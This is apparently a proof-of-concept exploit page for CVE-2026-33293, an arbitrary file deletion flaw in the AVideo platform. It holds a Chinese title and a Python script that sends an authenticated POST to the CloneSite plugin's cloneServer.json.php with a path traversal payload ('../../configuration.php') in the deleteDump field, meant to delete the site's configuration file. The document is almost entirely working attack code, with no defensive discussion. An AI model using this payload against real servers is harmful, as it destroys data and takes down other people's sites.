CVE-2026-33293 AVideo任意文件删除漏洞

import requests # Target URL (replace with actual target) target_url = "http://example.com/plugin/CloneSite/cloneServer.json.php" # Attacker needs valid credentials/session (PR:L requirement) # Assuming session cookie or token is required based on description cookies = { "PHPSESSID": "valid_session_id_here", "user": "valid_user_token_here" } # Payload using path traversal to delete configuration.php payload = { "deleteDump": "../../configuration.php" } try: response = requests.post(target_url, data=payload, cookies=cookies, timeout=10) if response.status_code == 200: print("[+] Request sent successfully. Check if file is deleted.") print("[+] Response:", response.text) else: print("[-] Request failed with status code:", response.status_code) except Exception as e: print("[-] An error occurred:", e)